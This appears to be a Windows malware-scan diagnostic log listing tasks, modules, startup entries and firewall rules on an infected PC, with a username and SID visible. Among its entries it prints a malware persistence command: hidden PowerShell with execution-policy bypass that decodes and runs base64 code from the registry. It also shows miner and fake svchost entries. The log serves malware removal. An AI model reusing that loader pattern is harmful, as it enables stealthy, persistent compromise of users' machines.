Task: {37EBAED9-F813-4865-A365-29406F41D71D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000Core => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {449DD0F4-4DFD-4E97-8DC5-0FF97BDC88FF} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {4AB82519-9D53-4119-8319-BE41514A8414} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {53C8778A-782A-4C9E-A949-8F106DC3BD3F} - System32\Tasks\HPCustParticipation HP Deskjet 2510 series => C:\Program Files\HP\HP Deskjet 2510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.)
Task: {548372FC-6B07-4DBE-A71A-7BD46C2A8EB9} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\TuneUp Utilities 2014\OneClick.exe
Task: {5ABC9943-101A-4F05-B7AD-D427F415D6F4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {61BEF99E-52DE-4A6B-8D40-D5AB74B12B2A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-02] (Google Inc.)
Task: {627A5BFA-279A-4610-B6BB-0C916D7C7FDE} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {7950B1CD-7C17-4D3B-AEA9-B3605BF394BA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {88D277A6-0226-4F8D-8001-20D332B2AA29} - System32\Tasks\Update\helpars => C:\Users\Betts\AppData\Roaming\System.exe <==== ATTENTION
Task: {8C06711F-90B5-452A-A7C4-D1AC02B6950A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {A582A818-ED4F-4110-9E40-1E290B1501D8} - System32\Tasks\gxx speed launcher => C:\Program Files (x86)\Garena\Garena\Garena.exe [2018-08-07] (Garena Online )
Task: {A679A318-C394-4997-B386-702F5D7F043D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-11-14] (Adobe Systems Incorporated)
Task: {AC1A5344-96CD-4148-8C74-85D28483B360} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-14] (Adobe Systems Incorporated)
Task: {ACB64EC4-FD3D-4325-90A7-656068ECFE69} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-06] (Piriform Ltd)
Task: {BB3ACBDC-2281-4407-B558-4BE294C6F86A} - System32\Tasks\{24EBF07D-D2DD-436F-908B-58FED99EA3B1} => C:\Windows\system32\pcalua.exe -a C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe -c /M{9527A496-5DF9-412A-ADC7-168BA5379CA6}
Task: {C7386A5F-D57F-4D77-8C47-E756451B32E7} - System32\Tasks\{7AF87748-6B4F-4472-993C-3954074A69E1} => C:\Windows\system32\pcalua.exe -a "C:\Users\Betts\Desktop\Flash Tool\Flash_tool.exe" -d "C:\Users\Betts\Desktop\Flash Tool"
Task: {CAD3FED0-847F-4613-9D04-668DC6FFDCFA} - System32\Tasks\{32A4D785-0591-4CB9-A6DD-BAB8D55D502B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RAMRush\unins000.exe"
Task: {D0D55D6F-2C5F-4203-9AED-13E74FB16EC8} - System32\Tasks\{44021E53-AD40-4781-A507-DC00B00E7BF0} => C:\Windows\system32\pcalua.exe -a C:\Users\Betts\Desktop\StealthMiner2.0\StalthMinerInstaller.exe -d C:\Users\Betts\Desktop\StealthMiner2.0
Task: {D71B6302-292F-45A9-AC84-E7786EEE1BF0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-21] (Microsoft Corporation)
Task: {DE66A451-B198-402A-B850-79F317F54873} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000UA => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {EA1C7874-9BBA-4779-968E-2C66894DCF8C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-21] (Microsoft Corporation)
Task: {F9A08F7B-5A7A-459D-A766-70D21D18EDA8} - System32\Tasks\{FBAB01FF-9700-4958-B7A3-1563162FBF0E} => C:\Program Files (x86)\Cheat Engine 6.2\Cheat Engine.exe [2012-04-29] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DriverDR Scheduled Scan.job => C:\Program Files\DriverDR.com\DriverDR\DriverDR.exe--scan C:\Program Files\DriverDR.com
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000Core.job => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000UA.job => C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\gxx speed launcher.job => C:\Program Files (x86)\Garena\Garena\Garena.exe
Task: C:\Windows\Tasks\Opera scheduled Autoupdate 4086469641.job => C:\Users\Betts\AppData\Roaming\Microsoft\Windows\icfgratf\bafcjfdr.exe
Task: C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job => D:\WR_Tray_Icon.exeD:\Tweaking.com - Windows Repair)Created By Tweaking.com

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Betts\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Betts\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Betts\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> –enable-easy-off-store-extension-install" --disable-quic

==================== Loaded Modules (Whitelisted) ==============

2018-05-15 18:58 - 2018-05-15 18:58 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-05-15 18:59 - 2018-05-15 18:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2018-08-11 23:27 - 2018-08-23 20:39 - 000026112 _____ () C:\Windows\KMS-R@1n.exe
2013-05-12 16:35 - 2013-05-12 16:35 - 000076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2017-12-01 16:44 - 2017-12-01 16:44 - 000080896 _____ () c:\programdata\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\IEProtectDll64.dll
2018-01-08 21:00 - 2018-01-08 21:00 - 000076456 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2012-06-18 23:24 - 2012-06-18 23:24 - 000222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2018-01-18 23:28 - 2018-01-16 21:48 - 000097792 __RSH () C:\Windows\SysWOW64\Windows Server\wserver.exe
2018-09-20 06:40 - 2018-10-22 20:46 - 002148864 _____ () C:\Program Files (x86)\arcai.com\netcut_windows.exe
2016-01-07 00:41 - 2016-01-07 00:41 - 000062168 _____ () C:\Program Files\CCleaner\branding.dll
2018-06-20 21:27 - 2016-02-25 03:30 - 000594944 _____ () C:\Program Files (x86)\I-Funbox DevTeam\exifext_x64.dll
2018-05-15 18:58 - 2018-05-15 18:58 - 000235832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxslt.dll
2018-10-06 21:04 - 2018-11-01 10:24 - 000169984 _____ () C:\Users\Betts\AppData\Local\Temp\svchost.exe
2017-10-13 14:46 - 2017-10-13 14:46 - 000266424 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\libprotobuf-lite.dll
2018-08-07 19:07 - 2018-08-07 19:07 - 001442624 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\libs\gxx_pipe_engine.dll
2018-08-07 19:06 - 2018-08-07 19:06 - 002207552 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\libs\FSFileSytem.dll
2017-12-01 16:44 - 2017-12-01 16:44 - 000088576 _____ () c:\programdata\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\mppsvc.dll
2017-12-01 16:44 - 2017-12-01 16:44 - 000428032 _____ () c:\programdata\{a7fb8cb9-0be2-4c79-bb9c-01f657a649ca}\MPProtect.dll
2018-02-06 17:03 - 2018-01-30 20:37 - 000047688 _____ () C:\Users\Betts\AppData\Local\Viber\qrencode.dll
2018-02-06 17:03 - 2018-01-30 20:37 - 011123272 _____ () C:\Users\Betts\AppData\Local\Viber\ViberRTC.dll
2018-02-06 17:03 - 2018-01-30 20:38 - 000483912 _____ () C:\Users\Betts\AppData\Local\Viber\imageformats\qsvg.dll
2016-02-08 20:45 - 2018-10-24 17:32 - 086734056 _____ () C:\Users\Betts\AppData\Roaming\Spotify\libcef.dll
2016-02-08 20:45 - 2018-10-24 17:31 - 004318952 _____ () C:\Users\Betts\AppData\Roaming\Spotify\libglesv2.dll
2016-02-08 20:45 - 2018-10-24 17:31 - 000098024 _____ () C:\Users\Betts\AppData\Roaming\Spotify\libegl.dll
2018-10-20 06:40 - 2018-10-20 06:40 - 025607152 _____ () C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.dll
2018-09-20 14:32 - 2018-09-20 14:32 - 000423408 _____ () C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\sqlite.dll
2018-09-20 14:32 - 2018-09-20 14:32 - 082922992 _____ () C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\libcef.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [133]
AlternateDataStreams: C:\Users\Betts\Cookies:Z9Vd5wjyCnrKb1R3FN3u9uOY [2266]
AlternateDataStreams: C:\Users\Betts\Local Settings:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Application Data:Sr8HGrESrmGgd8t2MMMzW7w [2006]
AlternateDataStreams: C:\Users\Betts\AppData\Local\Yl0t0Zf7okQM9:7Gt0kJJ90PbKkfYIBRyj [2158]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\.DEFAULT\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\.DEFAULT\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1"

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 10:34 - 2016-09-03 20:09 - 000001028 ____R C:\Windows\system32\Drivers\etc\hosts

0.0.0.0 pubads.g.doubleclick.net
0.0.0.0 securepubads.g.doubleclick.net
0.0.0.0 www.googletagservices.com
0.0.0.0 gads.pubmatic.com
0.0.0.0 ads.pubmatic.com
0.0.0.0 spclient.wg.spotify.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 114.108.195.1 - 114.108.193.201
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: AdAppMgrSvc => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AdobeUpdateService => 2
MSCONFIG\Services: AGSService => 2
MSCONFIG\Services: AirPrint => 2
MSCONFIG\Services: Apple Mobile Device Service => 2
MSCONFIG\Services: ArcService => 3
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: Droid4XService => 2
MSCONFIG\Services: FlexNet Licensing Service 64 => 3
MSCONFIG\Services: GarenaPlatform => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hadouken => 2
MSCONFIG\Services: HitmanProScheduler => 2
MSCONFIG\Services: IDriverT => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: KvAppService => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: LolScreenSaverService => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: NvContainerLocalSystem => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NVU => 2
MSCONFIG\Services: PassThru Service => 2
MSCONFIG\Services: Realtek11nSU => 2
MSCONFIG\Services: rpcapd => 3
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: TuneUp.UtilitiesSvc => 2
MSCONFIG\Services: UNS => 2
MSCONFIG\Services: WMS => 2
MSCONFIG\Services: WRSVC => 2
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: WsDrvInst => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Install LastPass FF RunOnce.lnk => C:\Windows\pss\Install LastPass FF RunOnce.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Install LastPass IE RunOnce.lnk => C:\Windows\pss\Install LastPass IE RunOnce.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^6879fe793de5f826544fc9bd3b3ae212.exe => C:\Windows\pss\6879fe793de5f826544fc9bd3b3ae212.exe.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^icfgratf.lnk => C:\Windows\pss\icfgratf.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet Ink Adv 2010 K010.lnk => C:\Windows\pss\Monitor Ink Alerts - HP Deskjet Ink Adv 2010 K010.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^PdaNet Desktop.lnk => C:\Windows\pss\PdaNet Desktop.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Betts^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^RzKHAzNO5B2KT5V.lnk => C:\Windows\pss\RzKHAzNO5B2KT5V.lnk.Startup
MSCONFIG\startupreg: 1CC1D7FC1BE52E567AEF850DA74CD4EE2A175F87._service_run => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service /prefetch:8
MSCONFIG\startupreg: 6879fe793de5f826544fc9bd3b3ae212 => "C:\ProgramData\audio.exe" ..
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: Aimersoft Helper Compact.exe => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Betts\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Autodesk Desktop App => "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
MSCONFIG\startupreg: Autodesk Sync => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: Dropbox Update => "C:\Users\Betts\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: iFunBox => C:\Program Files (x86)\I-Funbox DevTeam\iFunBox_x64.exe /tray
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: KeepVidMusicService => C:\Program Files (x86)\Keepvid\KeepVid Music (Desktop)\KeepVidMusicService.exe
MSCONFIG\startupreg: KiesTrayAgent => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
MSCONFIG\startupreg: Malwarebytes TrayApp => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe
MSCONFIG\startupreg: OpwareSE4 => "C:\Program Files (x86)\ScanSoft\OmniPageSE4.0\OpwareSE4.exe"
MSCONFIG\startupreg: ProfilerU => C:\Program Files\Saitek\SD6\Software\ProfilerU.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\Saitek\SD6\Software\SaiMfd.exe
MSCONFIG\startupreg: Spotify => C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe --autostart
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Betts\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: SSBkgdUpdate => "C:\Program Files (x86)\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
MSCONFIG\startupreg: WRSVC => "C:\Program Files\Webroot\WRSA.exe" -ul
MSCONFIG\startupreg: {C656898E-5C97-4D32-B1BD-4DA1679104E8} => C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\HCLUXGUXIRVGPI').NIWFUVUXRL)));

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{38FC2823-8875-481D-B4DB-0711A4BD8FDC}] => (Allow) C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtWLan.exe
FirewallRules: [{2CE36BB2-2328-40BF-848E-8DD65E92BB77}] => (Allow) C:\Program Files (x86)\Realtek\Wireless LAN Utility\RtWLan.exe
FirewallRules: [{F3CBCB5D-B86F-48E9-BB3D-6CF5C5984533}] => (Allow) LPort=1542
FirewallRules: [{2C86EA06-4CE1-4987-856A-BBD5C0EF71AA}] => (Allow) LPort=1542
FirewallRules: [{673CA603-3E84-4345-B6B2-B2582D305262}] => (Allow) LPort=53
FirewallRules: [{67D898C8-B9FF-4C21-A9AD-A1A0C5DBE3A4}] => (Allow) C:\Users\Betts\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{5226B354-B1F3-46B7-9866-5AB20B1F2B4C}] => (Allow) C:\Users\Betts\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{09E540DC-F565-4FAD-B045-348305BBACC8}] => (Allow) C:\Program Files\HP\HP Deskjet Ink Adv 2010 K010\Bin\USBSetup.exe
FirewallRules: [{3F930024-B487-4904-8EAB-CCC9814BB83A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{688862EA-9456-4289-88D3-DBFC65C3A976}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2BA7FD68-87B6-4A30-87DE-22F53B759336}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{930B4E15-21A2-4842-9A20-F7CDEEEA62D2}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [TCP Query User{7CF602F0-2FC0-412C-9088-4D6D21FFE0EB}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{4925DBFF-CE1F-437C-99C4-589C0D560F4B}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{AA399512-787C-44EE-A82C-24DE43172677}C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{BDA7EC6C-3435-4752-963D-FBA0C44E765B}C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\betts\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{16AE05FF-46DD-44B4-B291-2077CAA0BA12}] => (Allow) C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{BCE2F750-AABB-4599-8D3F-927600AF2CBD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7AD8BDE1-3DF9-4ED8-8C35-AAEC94D33970}] => (Allow) LPort=2869
FirewallRules: [{F146702D-DAA7-4530-B38D-D8C3602B3486}] => (Allow) LPort=1900
FirewallRules: [{EC82EEB3-660D-46C1-AA13-A7C3E9E00535}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{AF4FF19E-6F37-428D-8A0B-5DB6C007292D}] => (Allow) LPort=8370
FirewallRules: [{6150B8A3-726E-49FC-868E-FEECC4889ADD}] => (Allow) LPort=8370
FirewallRules: [{F59B944A-6517-434E-8BD2-552E49695214}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{DBA2072D-FE6E-400E-9049-A70F9DFFFBB3}] => (Allow) C:\Program Files (x86)\GarenaLoLPH\GameData\Apps\LoLPH\Game\League of Legends.exe
FirewallRules: [{8BFA5969-DBAF-48BC-8D17-B1C6F1224837}] => (Allow) C:\Program Files (x86)\AirPrint\airprint.exe
FirewallRules: [TCP Query User{DF334884-AB9F-4138-B07B-4E3F0189D35A}C:\program files (x86)\printershare\paconsole.exe] => (Allow) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [UDP Query User{59CC10B2-CDFE-46E4-A895-7606B32727DD}C:\program files (x86)\printershare\paconsole.exe] => (Allow) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [TCP Query User{4A4365C4-2414-4E5B-B946-385D117BDFB5}C:\program files (x86)\printershare\paconsole.exe] => (Block) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [UDP Query User{2409DEFB-FF6E-4037-A062-B6E645F2149F}C:\program files (x86)\printershare\paconsole.exe] => (Block) C:\program files (x86)\printershare\paconsole.exe
FirewallRules: [{B920C7D2-B0FE-4FEE-9288-9FD6F1BF60F7}] => (Allow) C:\Program Files\HP\HP Deskjet 2510 series\Bin\USBSetup.exe
FirewallRules: [{AC4E9A9D-77B4-440C-9A81-C2CC136C5F54}] => (Allow) LPort=8370
